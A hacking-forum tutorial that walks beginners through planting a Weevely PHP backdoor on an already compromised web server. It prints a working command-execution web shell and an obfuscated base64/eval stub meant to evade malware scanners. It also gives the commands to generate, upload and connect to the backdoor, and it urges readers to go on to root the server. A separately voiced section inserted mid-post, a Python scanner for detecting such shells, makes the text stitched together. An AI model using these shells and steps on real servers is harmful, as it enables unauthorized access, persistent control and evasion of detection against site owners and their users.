Hi
I have seen many posts from new members of ISA about having problems with backdoors, and mainly with back-connecting to the server. So I thought to make a small noob-friendly tutorial on how to back-connect with a base64 encrypted backdoor (a simple PHP shell) which is very small in size (about 500 bytes). The method which I will demonstrate here is one of the best methods of backdoor and back-connect I have used.


What is a Backdoor?

A back door is a means of access to a computer program that bypasses security mechanisms. Let me spell it out. In simple words, a backdoor is a piece of code (it can be a trojan, a PHP shell, a Perl shell etc.) injected by a hacker once he has breached the security of a system, and it lets him back in every time he wants to access the system, even after the security of the system has been patched (with some exceptions)!

Now, to perform this hack the requirements are:

1) A shelled web server - I have mine

To view the pic click here: http://postimage.org/image/5ccrgbojf/

2) A Python based program called Weevely.

What is Weevely :

Weevely is an unobtrusive PHP backdoor that simulates a telnet-like connection. It is used for web attack post-exploitation or web hosting account management. With basic permission to upload PHP files, we only need to generate and upload the "server" PHP code on the target and run Weevely locally to transmit shell commands.

Weevely is pre-installed in BackTrack 5. If you are using another Linux distro you can download it from here: Download weevely

Now let's start:

Step 1 - Generate the Backdoor.

Open the Weevely tool which you have just installed.

For BackTrack users, you can run it directly from Applications, or run this command in a terminal:

root@bt:~# cd /pentest/backdoors/web/weevely

For users who have installed it on another Linux distro, run this command in a terminal (using the folder where you extracted Weevely):

$ cd /path/to/weevely

You will get a terminal like this: click here http://postimage.org/image/wd66fo2gh/


Now we have to generate the backdoor in encrypted form so that it stays stealthy and is not detected by Linux malware-detection programs.

This can be done easily with Weevely.

The PHP shell which we are going to use is simple-backdoor.php


The code of this shell is:

Code:
<?php

if(isset($_REQUEST['cmd'])){
  echo "<pre>";
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
  echo "</pre>";
  die;
}

?>


For this, run the following command in the Weevely terminal which you have opened:

./weevely.py generate PASSWORD /path/to/save/hello.php

For example, I have encrypted a shell with the password 123456 and saved it on my desktop with the name hello.php. Therefore my command is:

./weevely.py generate 123456 /root/Desktop/hello.php

As shown in the pic, click here: http://postimage.org/image/dx8j0kmab/

The encrypted code is:


Code:
<?php

$hv4="cmF5KCcnLCcrJywxksIGpvawxW4oYwxXJyYXlfc2xpY2UoJGwxEsJGMwxoJGwxEpLTMpKSkpKTtlY2hv​ICc8LycuJGsuJz4nO30=";
$hv1="wxJGM9Jwx2NvdWwx50wxJzswxkwxYT0kX0NwxPT0wxtJwxRTtpZihyZXNldCgkYSk9wxPScxMicgJiYw​xgJGMoJGEp";
$asp = "xbxasxex6x4x_dxexcxoxdxe";
$hv2="PjwxMwxpe2wxluaV9zZXQoJ2Vycm9yX2xvZycwxsICwxcvZGV2L251bGwnKTskaz0nMzQ1Nic7ZWNoby​AnPCcuJGwxsuJz4nO2V2YWwwxowx";
$hv3="YmFzZTwxY0wxX2RlY29kZShwcmVnX3JlcGxwxhY2UoYXJwxyYXwxkoJy9bXlwxx3PVxzXwxS8nLCcvXH​MvJyksIGwxFy";
$nwb = "str_replace";
$asp = $nwb("x", "", $asp);
eval($asp($nwb("wx", "", $hv1.$hv2.$hv3.$hv4)));

?>


This backdoor is only about 500 bytes in size.
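As an added example (my own code, not from the original post or from Weevely), here is a small static scanner for the two file shapes shown above. The generated stub is base64-encoded and padded with filler characters rather than truly encrypted, so a defender does not need the password to recognise it: the scanner looks for a request variable reaching a shell sink, eval() called on a variable-function result, str_replace stripping filler out of a literal, and several long base64-looking strings. The PHP snippets at the bottom are constructed for the demo.

```python
# Added example (not from the post or Weevely): static scanner for the plain
# system($_REQUEST['cmd']) shell and for the obfuscated stub that rebuilds
# "base64_decode" with str_replace and hands the result to eval().
import re

SUPERGLOBALS = {"_REQUEST", "_GET", "_POST"}
# $cmd = ($_REQUEST['cmd']);  -> "cmd" becomes request-tainted
TAINT_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\(?\s*\$_(?:REQUEST|GET|POST)\b")
# system($cmd) / exec($_GET...) -> the variable handed to a shell sink
SINK_CALL = re.compile(r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$(\w+)")
# eval() whose argument is a variable function call, e.g. eval($asp(...))
EVAL_VARFUNC = re.compile(r"\beval\s*\(\s*\$\w+\s*\(")
# str_replace (or a variable holding its name) stripping 1-3 filler chars
# out of a literal, e.g. $nwb("x", "", "xbxasxex6x4x_dxexcxoxdxe")
STRIP_FILLER = re.compile(
    r"(?:\bstr_replace|\$\w+)\s*\(\s*['\"][^'\"]{1,3}['\"]\s*,\s*['\"]['\"]\s*,")
# long base64-looking literals: the encoded payload chunks
B64_LITERAL = re.compile(r"['\"][A-Za-z0-9+/=]{40,}['\"]")

def scan_php(source: str) -> list:
    """Return the indicator names found in one PHP source string."""
    hits = []
    tainted = set(TAINT_ASSIGN.findall(source)) | SUPERGLOBALS
    if any(name in tainted for name in SINK_CALL.findall(source)):
        hits.append("request_to_shell_sink")
    if EVAL_VARFUNC.search(source):
        hits.append("eval_of_variable_function")
    if STRIP_FILLER.search(source):
        hits.append("filler_stripping_str_replace")
    if len(B64_LITERAL.findall(source)) >= 2:
        hits.append("multiple_base64_blobs")
    return hits

def is_suspicious(source: str) -> bool:
    """A request-to-shell sink alone, or any two indicators, flags the file."""
    hits = scan_php(source)
    return "request_to_shell_sink" in hits or len(hits) >= 2

# Constructed samples (not real payloads), shaped like the files on the page.
BENIGN = "<?php $t = str_replace('foo', 'bar', $title); echo htmlspecialchars($t); ?>"
PLAIN_SHELL = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); } ?>"
OBFUSCATED = ("<?php $a='QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVG';\n"
              "$b='R0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVGR0hJSktM';\n"
              "$f='xbxasxex6x4x_dxexcxoxdxe'; $r='str_replace'; $f=$r('x','',$f);\n"
              "eval($f($r('wx','',$a.$b))); ?>")

if __name__ == "__main__":
    for src in (BENIGN, PLAIN_SHELL, OBFUSCATED):
        print(is_suspicious(src), scan_php(src))
```

Run it over a web root with a loop over *.php files; the indicator list tells you which pattern fired so a benign str_replace call alone never trips it.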

Step 2 - Upload the Backdoor.

Now upload the shell hello.php to the web server.

Step 3 - Back-Connect.

Many people have problems with back-connecting, because it needs a suitable port to be chosen which is open and not blocked by the firewall. In this method you don't need to worry about ports (open/closed/blocked), because Weevely sends the commands to the uploaded page over ordinary HTTP requests instead of opening a separate reverse connection from the server. We can directly back-connect with the help of Weevely.

To back-connect and start a terminal from which to execute commands, type the command:

./weevely.py http://www.sitename.com/path/to/hello.php PASSWORD

For example, if you have uploaded the shell in the images folder, in the sub-folder uploads, then your command becomes:

./weevely.py http://www.sitename.com/images/uploads/hello.php PASSWORD

where PASSWORD is the password which you used while encrypting the shell hello.php.

My password is 123456 and therefore my command will become:

./weevely.py http://www.sitename.com/hello.php 123456

When everything goes right you will be connected to the server with a telnet-like session from which you can execute commands.

As shown in pic click here http://postimage.org/image/goq6pu3kv/

Step 4 - Execute Commands.

Now I am going to check whether it is the same server on which I have uploaded the backdoor and whether I can execute shell commands.

For this, let's start with a simple command, " uname -a ", which shows information about the version of the Linux server.

As shown in the pic, click here: http://postimage.org/image/omhhaxnjl/

And yeah, the command got executed, showing the version of the Linux server, and when you compare the shell and the above image you will notice that it is the same server on which we uploaded the backdoor!!


Now you can go further and explore the files or ROOT the Linux box, which is considered the HOLY GRAIL in hacking.

COMMENT FOR ANY DOUBTS

G0ld3nph30nix Ash3s